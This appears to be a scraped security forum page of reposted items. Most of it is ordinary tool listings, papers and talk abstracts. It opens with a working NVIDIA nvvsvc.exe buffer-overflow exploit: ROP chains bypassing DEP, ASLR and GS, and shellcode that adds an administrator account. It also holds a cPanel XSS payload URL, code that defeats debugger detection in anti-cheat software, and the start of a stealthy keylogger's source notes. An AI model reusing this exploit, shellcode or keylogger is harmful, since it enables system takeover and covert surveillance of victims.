WriteDword(0x42424242); return buf; } int main(int argc, char* argv[]) { DWORD dwReturnCode = 1, dwBytesInOut = 0; HANDLE hPipe = NULL; static BYTE rgReadBuf[GENERIC_BUF_LENGTH] = {0}; printf( " ** Nvvsvc.exe Nsvr Pipe Exploit (Local/Domain) **\n" " [@peterwintrsmith]\n" " - Win7 x64 DEP + ASLR + GS Bypass - Christmas 2012 -\n" ); if(argc < 2) { printf("\tUsage: %s <ip>|local\n\n", argv[0]); printf( " !! If exploiting remotely, create a session with the target using your domain credentials !!\n" "\tCommand: net use \\\\target.ip\\ipc$ /u:domain\\user password\n" ); goto Cleanup; } memset(rgReadBuf, 0, sizeof(rgReadBuf)); ProtocolMessage rgConvoMsg[] = { {ProtocolAction_Connect, NULL, 0}, {ProtocolAction_Send, BuildMalicious_LeakStack(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4200}, {ProtocolAction_ReadCookie, {0}, 0}, {ProtocolAction_Send, BuildMalicious_FillBuf(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4000}, {ProtocolAction_Send, BuildMalicious_OverwriteStack(), 0x4020}, {ProtocolAction_Receive, {0}, 0x4200}, {ProtocolAction_Disconnect, NULL, 0}, }; DWORD dwNumberOfMessages = sizeof(rgConvoMsg) / sizeof(ProtocolMessage), i = 0; BOOL bTryAgain = FALSE; char szPipe[256] = {0}; if(stricmp(argv[1], "local") == 0) strcpy(szPipe, "\\\\.\\pipe\\nvsr"); else sprintf(szPipe, "\\\\%s\\pipe\\nvsr", argv[1]); while(i < dwNumberOfMessages) { printf("\n\tAction %u of %u: ", i + 1, dwNumberOfMessages); switch(rgConvoMsg[i].Action) { case ProtocolAction_Connect: printf(" - CONNECT\n"); hPipe = EstablishPipeConnection(szPipe); if(!hPipe) { printf("!! Unable to create named pipe (GetLastError() = %u [0x%x])\n", GetLastError(), GetLastError()); goto Cleanup; } break; case ProtocolAction_Disconnect: printf(" - DISCONNECT\n"); CloseHandle(hPipe); hPipe = NULL; break; case ProtocolAction_Send: printf(" - CLIENT => SERVER\n"); if(!(dwBytesInOut = WritePipe(hPipe, rgConvoMsg[i].Buf, rgConvoMsg[i].Length))) { printf("!! Error writing to pipe\n"); goto Cleanup; } printf("\t\tWritten %u (0x%x) characters to pipe\n", dwBytesInOut, dwBytesInOut); break; case ProtocolAction_Receive: printf("\t - SERVER => CLIENT\n"); if(!(dwBytesInOut = ReadPipe(hPipe, rgReadBuf, rgConvoMsg[i].Length, FALSE))) { printf("!! Error reading from pipe (at least, no data on pipe)\n"); goto Cleanup; } printf("\t\tRead %u (0x%x) characters from pipe\n", dwBytesInOut, dwBytesInOut); break; case ProtocolAction_ReadCookie: // x64 Metasploit cmd/exec: // "net user r00t r00t00r! /add & net localgroup administrators /add" // exitfunc=thread char pb_NetAdd_Admin[] = "" "\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52" "\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48" "\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9" "\x48\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41" "\x01\xc1\xe2\xed\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48" "\x01\xd0\x8b\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01" "\xd0\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48" "\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9\x48\x31\xc0" "\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0\x75\xf1\x4c\x03\x4c" "\x24\x08\x45\x39\xd1\x75\xd8\x58\x44\x8b\x40\x24\x49\x01\xd0" "\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04" "\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59" "\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" "\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00\x00\x00" "\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b\x6f" "\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" "\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb" "\x47\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64" "\x20\x2f\x63\x20\x6e\x65\x74\x20\x75\x73\x65\x72\x20\x72\x30" "\x30\x74\x20\x72\x30\x30\x74\x30\x30\x72\x21\x20\x2f\x61\x64" "\x64\x20\x26\x20\x6e\x65\x74\x20\x6c\x6f\x63\x61\x6c\x67\x72" "\x6f\x75\x70\x20\x61\x64\x6d\x69\x6e\x69\x73\x74\x72\x61\x74" "\x6f\x72\x73\x20\x72\x30\x30\x74\x20\x2f\x61\x64\x64\x00"; printf("Building exploit ...\n"); unsigned __int64 uiStackCookie = *(unsigned __int64 *)(rgReadBuf + 0x4034); printf("\t\t => Stack cookie 0x%x%x:\n", (DWORD)(uiStackCookie >> 32), (DWORD)uiStackCookie); memcpy(rgConvoMsg[4].Buf + 0xc + 0xc, &uiStackCookie, 8); unsigned __int64 uiRetnAddress = *(unsigned __int64 *)(rgReadBuf + 0x4034 + 8), uiBase = 0, *pRopChain = NULL; // Perform some limited fingerprinting (my default install version, vs latest at time of testing) switch(uiRetnAddress & 0xfff) { case 0x640: // 04/11/2011 05:19 1,640,768 nvvsvc.exe [md5=3947ad5d03e6abcce037801162fdb90d] { uiBase = uiRetnAddress - 0x4640; printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); // Param 1: lpAddress [r11 (near rsp) into rcx] pRopChain[0] = uiBase + 0x19e6e; // nvvsvc.exe+0x19e6e: mov rax, r11; retn pRopChain[1] = uiBase + 0xa6d64; // nvvsvc.exe+0xa6d64: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn pRopChain[2] = 0; // Padding pRopChain[3] = 0; // ... pRopChain[4] = 0; // ... pRopChain[5] = 0; // ... pRopChain[6] = 0; // ... pRopChain[7] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] pRopChain[9] = uiBase + 0xa8653; // nvvsvc.exe+0xa8653: mov rdx, rax; mov rax, rdx; add rsp, 28h; retn pRopChain[10] = 0; // Padding pRopChain[11] = 0; // ... pRopChain[12] = 0; // ... pRopChain[13] = 0; // ... pRopChain[14] = 0; // ... pRopChain[15] = uiBase + 0x7772; // nvvsvc.exe+0x7772: pop r8; retn pRopChain[16] = 0x40; // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] pRopChain[17] = uiBase + 0x7773; // nvvsvc.exe+0x7773: pop rax; retn // Param 4: lpflOldProtect [r9 - already points at writable location] pRopChain[18] = uiBase + 0xfe5e0; // nvvsvc.exe+0xfe5e0: IAT entry &VirtualProtect pRopChain[19] = uiBase + 0x5d60; // nvvsvc.exe+0x5d60: mov rax, [rax]; retn pRopChain[20] = uiBase + 0x91a85; // nvvsvc.exe+0x91a85: jmp rax pRopChain[21] = uiBase + 0xe6251; // nvvsvc.exe+0xe6251: jmp rsp (return address from VirtualProtect) memcpy(pRopChain + 22, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin)); } break; case 0xa11: // 01/12/2012 05:49 890,216 nvvsvc.exe [md5=3341d2c91989bc87c3c0baa97c27253b] { uiBase = uiRetnAddress - 0x3a11; printf("\t\t => nvvsvc.exe base 0x%x%x:\n", (DWORD)(uiBase >> 32), (DWORD)uiBase); pRopChain = (unsigned __int64 *)(rgConvoMsg[4].Buf + 0xc + 0xc + (7*8)); // Param 1: lpAddress [r11 (near rsp) into rcx] pRopChain[0] = uiBase + 0x15b52; // nvvsvc.exe+0x15b52: mov rax, r11; retn pRopChain[1] = uiBase + 0x54d4c; // nvvsvc.exe+0x54d4c: mov rcx, rax; mov eax, [rcx+4]; add rsp, 28h; retn pRopChain[2] = 0; // Padding ... pRopChain[3] = 0; // ... pRopChain[4] = 0; // ... pRopChain[5] = 0; // ... pRopChain[6] = 0; // ... pRopChain[7] = uiBase + 0x8d7aa; // nvvsvc.exe+0x8d7aa: pop rdx; add al, 0; pop rbp; retn pRopChain[8] = 0x1; // Param 2: dwSize [rdx = 1 (whole page)] pRopChain[9] = 0; // Padding ... // Param 3: flNewProtect [r8 = 0x40 (PAGE_EXECUTE_READWRITE)] pRopChain[10] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn pRopChain[11] = 0x40; // PAGE_EXECUTE_READWRITE pRopChain[12] = uiBase + 0x8d26; // nvvsvc.exe+0x8d26: mov r8d, eax; mov eax, r8d; add rsp, 28h; retn pRopChain[13] = 0; // Padding ... pRopChain[14] = 0; // ... pRopChain[15] = 0; // ... pRopChain[16] = 0; // ... pRopChain[17] = 0; // ... pRopChain[18] = uiBase + 0xd33a; // nvvsvc.exe+0xd33a: pop rax; retn // Param 4: lpflOldProtect [r9 - already points at writable location] pRopChain[19] = uiBase + 0x91310; // IAT entry &VirtualProtect - 0x128 pRopChain[20] = uiBase + 0x82851; // nvvsvc.exe+0x82851: mov rax, [rax+128h]; add rsp, 28h; retn pRopChain[21] = 0; // Padding ... pRopChain[22] = 0; // ... pRopChain[23] = 0; // ... pRopChain[24] = 0; // ... pRopChain[25] = 0; // ... pRopChain[26] = uiBase + 0x44fb6; // nvvsvc.exe+0x44fb6: jmp rax pRopChain[27] = uiBase + 0x8a0dc; // nvvsvc.exe+0x8a0dc: push rsp; retn memcpy(pRopChain + 28, pb_NetAdd_Admin, sizeof(pb_NetAdd_Admin)); } break; } break; } i++; } dwReturnCode = 0; Cleanup: if(hPipe) CloseHandle(hPipe); return dwReturnCode; } Sursa: NVidia Display Driver Buffer Overflow ? Packet Storm

A? Pune un screenshot.

Aveti si chat: https://rstforums.com/chat/ Sa ma anuntati daca e vreo problema cu el, e pus pe fuga.

https://rstforums.com/chat/

Silences Programming Tour with MASM32 [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Silence[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]Silences Programmings Tour - MASM32 (General Edition) - Programming and Coding - Tuts 4 You[/TD] [/TR] [/TABLE] In this series I will teach you how to code in MASM32. Everything is very well explained, each line, each word and each API. This tour is called "General Edition" simply because I will learn you general MASM32 programming. In the examples I will teach you how to code a simple messagebox up to a MP3 music player. Content: (including source) 1. Introduction, Setup & Skeleton of Exe 2. Our first MessageBox 3. Our first DialogBox 4. DialogBox in Detail 5. Default toolbar controls part 1 (RichEdit, Trackbar, Radiobutton & Checkbox) 6. Default toolbar controls part 2 (Progressbar & Tabs) 7. Default toolbar controls part 3 (Listbox) 8. Default DialogBoxes (Color, Font, Open, Save, Print, Page-Setup, Find-Text, Find-Replace) 9. Simple file management 10. Showing Bitmap image & Playing mp3 files 11. Windows Registry + Final words [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]161.41 MB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 07:21:57[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3430 Sursa: Silences Programming Tour with MASM32 / Programming / Coding / Downloads - Tuts 4 You

Software Testing and Binary Static Analysis [Analysis of computer software, malware] Author: Ralf Hund, Carsten Willems, Dennis Felsch, Andreas Fobian, Thorsten Holz A detailed understanding of the behavior of exploits and malicious software is necessary to obtain a comprehensive overview of vulnerabilities in operating systems or client applications, and to develop protection techniques and tools. To this end, a lot of research has been done in the last few years on binary analysis techniques to efficiently and precisely analyze code. Most of the common analysis frameworks are based on software emulators since such tools offer a fine-grained control over the execution of a given program. Naturally, this leads to an arms race where the attackers are constantly searching for new methods and techniques to detect such analysis frameworks in order to successfully evade analysis. In this paper, we focus on two aspects. As a first contribution, we introduce several novel mechanisms by which an attacker can delude an emulator. In contrast to existing detection approaches that perform a dedicated test on the environment and combine the test with an explicit conditional branch, our detection mechanisms introduce code sequences that have an implicitly different behavior on a native machine when compared to an emulator. Such differences in behavior are caused by the side-effects of the particular operations and imperfections in the emulation process that cannot be mitigated easily. Even powerful analysis techniques such as multi-path execution cannot analyze our detection mechanisms since the emulator itself is deluded. Motivated by these findings, we introduce a novel approach to generate execution traces. We propose to utilize the processor itself to generate such traces. Mores precisely, we propose to use a hardware feature called branch tracing available on commodity x86 processors in which the log of all branches taken during code execution is generated directly by the processor. Effectively, the logging is thus performed at the lowest level possible. We present implementation details for both Intel and AMD x86 CPUs and evaluate the practical viability and effectiveness of this approach. [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]884.68 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 07:20:43[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3429 Sursa: Using Processor Features for Binary Analysis / Software Testing and Binary Static Analysis / Downloads - Tuts 4 You

[h=3]Cryptography / Algorithms [ Theory and implementation of cryptographic algorithms... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Dima Grigoriev, Vladimir Shpilrain[/TD] [/TR] [TR] [TD=class: forumheader3]Description[/TD] [TD=class: forumheader3]We employ tropical algebras as platforms for several cryptographic schemes that would be vulnerable to linear algebra attacks were they based on “usual” algebras as platforms.[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3428 Sursa: Tropical Cryptography / Cryptography / Algorithms / Downloads - Tuts 4 You

[h=3]OllyDbg 2.xx Plugins [ Here you can find most of the plugins ever written for OllyDbg v2.x... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Ferrit[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] ferrit.rce©gmail.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]http://forum.tuts4you.com/topic/30532-ollyext/[/TD] [/TR] [/TABLE] OllyExt is a plugin for Olly 2.xx debugger. The main intention of this plugin is to provide the biggest anti-anti debugging features and bugfixes for Olly 2.xx. Updates will come... The currently supported protections are the following: - IsDebuggerPresent - NtGlobalFlag - HeapFlag - ForceFlag - CheckRemoteDebuggerPresent - OutputDebugString - CloseHandle - SeDebugPrivilege - BlockInput - ProcessDebugFlags - ProcessDebugObjectHandle - TerminateProcess - NtSetInformationThread - NtQueryObject - FindWindow - NtOpenProcess - Process32First - Process32Next - ParentProcess - GetTickCount - timeGetTime - QueryPerformanceCounter - ZwGetContextThread - NtSetContextThread - KdDebuggerNotPresent - KdDebuggerEnabled - NtSetDebugFilterState - ProtectDRX - HideDRX The currently supported bugfixes are the following: - Caption change - Kill Anti-Attach ( dll integrity check ) Requirements: - Microsoft Visual C++ 2010 Redistributable Package (x86) OS support: - WinXP x32 - WinXP WoW64 - Win7 x32 - Win7 WoW64 [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]46.85 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 15:16:19[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3392 Sursa: OllyExt 1.0 / OllyDbg 2.xx Plugins / Downloads - Tuts 4 You

[h=3]Hardware Hacking [ Hacking and/or reverse engineering of custom hardware... ][/h] [TABLE=class: fborder] [TR] [TD=class: forumheader3]Author[/TD] [TD=class: forumheader3]Andy Davis[/TD] [/TR] [TR] [TD=class: forumheader3]Author email[/TD] [TD=class: forumheader3] andy.davis©ngssecure.com[/TD] [/TR] [TR] [TD=class: forumheader3]Author website[/TD] [TD=class: forumheader3]Security Testing Services & Compliance - NCC Group[/TD] [/TR] [/TABLE] Picture this scene, which incidentally happens thousands of times every day all around the world: Someone walks into a meeting room, sees a video cable and plugs it into their laptop. The other end of the cable is out of sight – it just disappears through a hole in the table. What is it connected to? Presumably the video projector bolted to the ceiling, but can it be trusted to just display their PowerPoint presentation? In this paper I will explain the circumstances in which display devices send data to their connected host and show that this data could potentially contain threats (which could compromise a laptop for example). I will describe video protocol data-structures, data-sequences and practical challenges. I will also explain how to build a hardware-based fuzzer, provide some example firmware fuzzing code, and describe some interesting findings from the fuzzing which has been undertaken so far. This paper discusses the security of video drivers which interpret and process data supplied to them by external displays, projectors and KVM switches. It covers all the main video standards, including VGA, DVI, HDMI and DisplayPort. This is a relatively new area of research and there is more research that could be performed in this area, so by summarising and sharing these resources, it is hoped that this will enable others to more quickly discover and investigate potential threats. [TABLE=class: fborder] [TR] [TD=class: forumheader3]Filesize[/TD] [TD=class: forumheader3]809.75 kB[/TD] [/TR] [TR] [TD=class: forumheader3]Date[/TD] [TD=class: forumheader3]Tuesday 25 December 2012 - 15:03:37[/TD] [/TR] [/TABLE] Download: http://tuts4you.com/request.php?3422 Sursa: HDMI – Hacking Displays Made Interesting / Hardware Hacking / Downloads - Tuts 4 You

Din cauza unor probleme nasoale cu logarea am repus salvarea IP-urile reale si nu random(). Daca chiar vreti sa nu aveti IP-urile salvate, sunteti si voi in stare sa folositi Tor sau altceva. Poate la sfarsitul anului, sau pe 1, sterg din nou toate IP-urile din DB. Poate facem asta saptamanal. Vedem.

Building A Web Attacker Dashboard With Modsecurity And Beef Description: Abstract The Browser Exploit Framework (BeEF) Project is extremely popular with application pentesters as it is a powerful tool for demonstrating the impacts of leveraging XSS vulnerabilities to achieve wider compromise into an organization. What if, however, we flipped the BeEF use-case around and instead put it in the hands of web application defenders? By using the open source ModSecurity WAF, we can dynamically hook web attackers with BeEF and monitor their activities and initiate various counter-meseasures. ***** Speaker: Ryan Barnett, Lead Security Researcher, Trustwave SpiderLabs, Metro DC Ryan C. Barnett is renowned in the web application security industry for his unique expertise. After a decade of experience defending government and commercial websites, Ryan joined Trustwave SpiderLabs Research Team. He specializes in application defense research and leads the open source ModSecurity web application firewall project. In addition to his commercial work at Trustwave, Ryan is also an active contributor to many community-based security projects. He serves as the Open Web Application Security Project (OWASP) ModSecurity Core Rule Set project leader and contributor on the OWASP Top Ten and AppSensor projects. He is a Web Application Security Consortium Board Member and leads the Web Hacking Incident Database and the Distributed Web Honeypot projects. At the SANS Institute, he is a certified instructor and contributor on the Top 20 Vulnerabilities and CWE/SANS Top 25 Most Dangerous Programming Errors projects. Ryan is regularly consulted by news outlets who are seeking his insights and analysis on emerging web application attacks, trends and defensive techniques. Ryan is a frequent speaker and trainer at key industry events including Blackhat, SANS AppSec Summit and OWASP AppSecUSA. Ryan has authored two web security books with titles such as: "Preventing Web Attacks with Apache" from Pearson Publishing and the forthcoming "Web Application Defender's Cookbook: Battling Hackers and Protecting Users" from Wiley Brothers Publishing. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Building a Web Attacker Dashboard with ModSecurity and BeEF - Ryan Barnett on Vimeo Sursa: Building A Web Attacker Dashboard With Modsecurity And Beef

Top Ten Web Defenses Description: Abstract We cannot hack or firewall our way secure. Application programmers need to learn to code in a secure fashion if we have any chance of providing organizations with proper defenses in the current threatscape. This talk will discuss the 10 most important security-centric computer programming techniques necessary to build low-risk web-based applications. The best security is contextual to each organization, application and feature. Real-world tradeoffs will be discussed in detail for each "control" and "control category" discussed. ***** Speaker Jim Manico, VP Security Architecture, WhiteHat Security Jim Manico is the VP of Security Architecture for WhiteHat Security. He is the founder, producer and host of the OWASP Podcast Series, as well as the committee chair for the OWASP Connections Committee. He is the project manager of the OWASP Cheatsheet series, and a significant contributor to several other OWASP projects. Jim provides secure coding and developer awareness training for WhiteHat Security using his 8+ years of experience delivering developer-training courses for SANS, Aspect Secur… Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Top Ten Web Defenses - Jim Manico on Vimeo Sursa: Top Ten Web Defenses

C-Panel Cross Site Scripting C-Panel suffers from a reflective cross site scripting vulnerability in manage.html. CPanel Non Persistent XSS Details ============= Product: Cpanel Security-Risk: High Remote-Exploit: yes Vendor-URL: http://www.cpanel.net Advisory-Status: NotPublished Credits ============= Discovered by: Rafay Baloch of RafayHackingArticles(RHA) Affected Products: ============= Cpanel's Latest Version Description ============= "Simploo website management." More Details ============= I have discsovered a non persistent Cross site scripting (XSS) inside Cpanel, the vulnerability can be easily exploited and can be used to steal cookies, perform phishing attacks and other various attacks compromising the security of a user. Proof of Concept ============= Log into your CPanel accoutn and navigate to the following link: https://localhost/frontend/x3/mail/manage.html?account= Now insert your xss payload inside account parameter. Exploit ============= https://localhost/frontend/x3/mail/manage.html?account=%22%3E%3Cimg%20src=x%20onerror=prompt%28/XSSBYRAFAY/%29;%3E Solution ============= Edit the source code to ensure that input is properly sanitised. Timeline ================ Use of terms ================ -- Warm Regards, Rafay Baloch http://rafayhackingarticles.net http://techlotips.com Sursa: C-Panel Cross Site Scripting ? Packet Storm

Hook Analyser Malware Tool 2.2 Authored by Beenu Arora | Site hookanalyser.blogspot.com Hook Analyser is a hook tool which can be potentially helpful in reversing applications and analysing malware. It can hook to an API in a process and search for a pattern in memory or dump the buffer. Changes: The UI and modules of the project have been re-written. The interactive mode is now more verbose. The (static) malware analysis module has been enhanced. Bug fixes and other improvements. Download: http://packetstormsecurity.org/files/download/119087/HookAnalyser2.2.zip Sursa: Hook Analyser Malware Tool 2.2 ? Packet Storm

[h=1]Q&A: Interview with an IT Security Analyst[/h]Tim Heard December 24, 2012 (Rebecca Turner is an IT security analyst, employed by a leading global services provider. Rebecca began her career in IT as a helpdesk technician and has advanced through a number of roles. She has considerable experience as a field engineer, and also as a systems administrator.) Q: I see from your background that you began your IT career working as a helpdesk technician. How did you get interested in IT security, and what led to you being in your current role? A. I was an office manager for several years, and helped bring a small office into the computer age, just by reading and a few community college classes. I found that I really, really enjoyed PCs and figuring out how to set them up. I realized that I didn’t want to be a secretary the rest of my life, so I kept going in college and eventually landed a junior helpdesk role 13 years ago. Q. What are the main duties of your current position? A. I now work in IT Security. I scan PCs when they are infected, perform network and local vulnerability assessments, and handle patching and reporting. Q. How well do you feel your training and education have prepared you for this position? A. I think my early training (A+, Net+ and college) was very valuable in my technical role. It gave me a solid foundation to continue on with. Q. What specific certifications have you earned? A. A+, Net+, Novell CNE 6, Security+, CISSP. Q. Looking back at your career, which of them have been the most helpful? A. A+ and Net+ for the early years, Security+ and CISSP for my current position. Q. Which of them, if any, have best prepared you for your current role, and why? A. CISSP, as the study gave me great overview of the security world Q. Are there certain certification programs which you feel, in retrospect, weren’t all that helpful in terms of preparing you for your career? A. My Novell CNE. I only got it to get a new job. I really never used the information. Q. If you could take additional coursework right now, or earn an additional certification, what would it be, and why? A. CEH, SANS 504. I want to learn more about pen testing and ethical hacking. Q. What are the main challenges someone faces as an IT security analyst that someone who is thinking of entering the field might not think about? A. It’s very important to have a technical background when going into the security field. At least five years would be my recommendation. Q. What advice would you give an IT generalist who is thinking of pursuing a career in IT Security? A. Get your technical certs, like A+ and Net+. Make sure you have at least five years of good hands-on technical troubleshooting. Q. What do you think are the prospects for this field in terms of job growth? A. I think the prospects are great. I think the job growth is only going to go up Q. What changes do you expect to see in the coming years? A. I HOPE that hiring managers learn the differences in the various certs and what they are used for. Why ask for a CISSP when you really need someone who just has a Security+? I expect to see more security generalist jobs, as companies try to cut costs. The more technical you are, the better path I think you’ll have since you’ll have the experience necessary to be that generalist. I also think we’re going to see many more compliance scanning jobs (PCI, HIPAA, SOX, etc), as more companies get into that kind of business. Sursa: InfoSec Institute Resources – Q&A: Interview with an IT Security Analyst

Four Axes Of Evil Description: Abstract This presentation focuses on large-scale internet vulnerability research from four unique perspectives, identifying patterns and exposing security issues that are difficult to identify using traditional approaches. ***** Speaker HD Moore, CSO, Rapid7 HD is Chief Security Officer at Rapid7 and Chief Architect of Metasploit, the leading open-source penetration testing platform. HD founded the Metasploit Project in the summer of 2003 with the goal of becoming a public resource for exploit code research and development. ***** Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Four Axes of Evil - HD Moore on Vimeo Sursa: Four Axes Of Evil

Bug Bounty Programs Description: Speakers Michael Coates Director of Security Assurance, Mozilla Michael Coates is the Director of Security Assurance at Mozilla. He is responsible for Mozilla’s software and infrastructure security which includes Firefox, web applications, and critical infrastructure. In this role he sets the security assurance strategy to integrate security into the development lifecycle of all applications and ensures that the organization's infrastructure is designed to minimize risk and protect critical data. | | Michael is also the Chairman of the OWASP board, … Chris Evans Troublemaker, Google Chris Evans is the author of vsftpd, a vulnerability researcher and for a paycheck, he built and now looks after the Google Chrome Security Team. Unruly bunch. | | Details of vsftpd are at security.appspot.com/vsftpd.html. His research includes vulnerabilities in all the major browsers (Firefox, Safari, Internet Explorer, Opera, Chrome); the Linux and OpenBSD kernels; Sun's JDK; and lots of open source packages. He blogs about some of his work at scarybeastsecurity.blogspot.c… Jeremiah Grossman CTO, WhiteHat Security Jeremiah Grossman is the Founder and Chief Technology Officer of WhiteHat Security, where he is responsible for Web security R&D and industry outreach. Over the last decade, Mr. Grossman has written dozens of articles, white papers, and is a published author. His work has been featured in the Wall Street Journal, Forbes, NY Times and hundreds of other media outlets around the world. | | As a well-known security expert and industry veteran, Mr. Grossman has been a guest speaker on six con… Adam Mein Security Program Manager, Google Some people like to find bugs; Adam likes to make sure they get fixed. He gets lots of opportunities to fulfill this (admittedly, sad) ambition as Manager of Google's Vulnerability Management team and Web Reward Program. | | Outside of work, Adam spends most of his time chasing around his 10 month old son and supporting his beloved Canberra Raiders rugby league team. Alex Rice Product Security, Facebook Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Bug Bounty Programs - Michael Coates, Chris Evans, Jeremiah Grossman, Adam Mein, Alex Rice on Vimeo Sursa: Bug Bounty Programs

[h=1]Hook (bypass) kernel32.dll IsDebuggerPresent[/h]By: [h=3]try catch[/h]I've found a code that bypass the IsDebuggerPresent in a anti cheat, but i don't know how use. Follow the code: #include <stdio.h> #include <stdlib.h> #include <windows.h> char KillIsDebuggerPresent(PROCESS_INFORMATION pi) { DWORD tib, pib; LDT_ENTRY segselector; CONTEXT TempContext; TempContext.ContextFlags = CONTEXT_SEGMENTS; GetThreadContext(pi.hThread,&TempContext); GetThreadSelectorEntry(pi.hThread, TempContext.SegFs, &segselector); tib =((segselector.HighWord.Bytes.BaseHi) << 24) + ((segselector.HighWord.Bytes.BaseMid) << 16) + (segselector.BaseLow); //printf("TIB @ %X\n", tib); if(ReadProcessMemory(pi.hProcess,(void *)(tib+0x30), &pib, sizeof(pib), NULL) == 0) { printf("Could not get PIB from TIB !\n"); return 0; } else { char debug_info = 0xFF; // printf("PIB @ %X\n", pib); pib += 2; if(ReadProcessMemory(pi.hProcess,(void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) { printf("Unable to read from PIB !\n"); return 0; } else { // printf("Old debug value in PIB: %X\n", debug_info); if(debug_info != 0x01) { printf("PB value unexpected. Aborting!"); return 0; } else { debug_info = 0; if(WriteProcessMemory(pi.hProcess,(void *)pib, &debug_info, sizeof(debug_info), NULL) == 0) { printf("Could not write new value into PIB !\n"); return 0; } else { //printf("PIB debug value override ok!\n"; return 1; } } // debug info } // read pib } // read tib } int main() { KillIsDebuggerPresent(...); return 0; } Sursa: Hook (bypass) kernel32.dll IsDebuggerPresent - rohitab.com - Forums

[h=1]Basic key logger but very small[/h]By: [h=3]drew77[/h] This isn't fancy like some I have seen here, but it is less than 5000 bytes. I am interested in a keylogger that would save screenshots at adjustable intervals as well as typed input. ;******************************************************************************************* ; (BEST Viewed with NOTEPAD) ; CopyRight 2005, by ZOverLord at ZOverLords@Yahoo.com - ALL Rights Reserved ; ; "We Don't NEED no STINKIN DLL!"......ENJOY! vist <a href="http://testing.OnlyTheRightAnswers.com" class="bbc_url" title="External link" rel="nofollow external">http://testing.OnlyTheRightAnswers.com</a> ; ; Proof Of Concept of using Low-Level Hooks without using any DLL for the Hook ; This Program is for Educational Proof Of Concept Use ONLY! ; ; This Program compiles in 4K, get it that's 4,096 Bytes. I got TIRED of all these folks ; who need a FAT program as well as a FAT DLL to create a Key-Logger so in frustration ; this proof of concept was created. Log Items include: ; ; Date-Time Stamps, Program Name, Window Title, Window Class, Domain Name, Computer Name ; User Name as well as the ability to be placed in StartUp Folders for ANY and/or ALL ; users. There is NOT any requirement for this to run as ADMIN, ANYONE can place it in ; the startup folder of any user, or for all users. ; ; The Logfile is named ZKeyLog.txt and seperate logs can be kept for seperate users this ; can be done automatically by simply placing the program in the: ; ; C:\Documents and Settings\All Users\Start Menu\Programs\Startup folder ; ; C:\Documents and Settings\?USER?\ folder as ZKeyLog.txt ; ("You can change the File to Hidden if needed") ; ; A Hot-Key of [CTRL]-[ALT]-[F11] will turn the Key-Logger Off ; ; There are two flavors one Raw ASM and one using INVOKES, Raw has more comments, low-level. ; ; You can rename the EXE file to something NOT 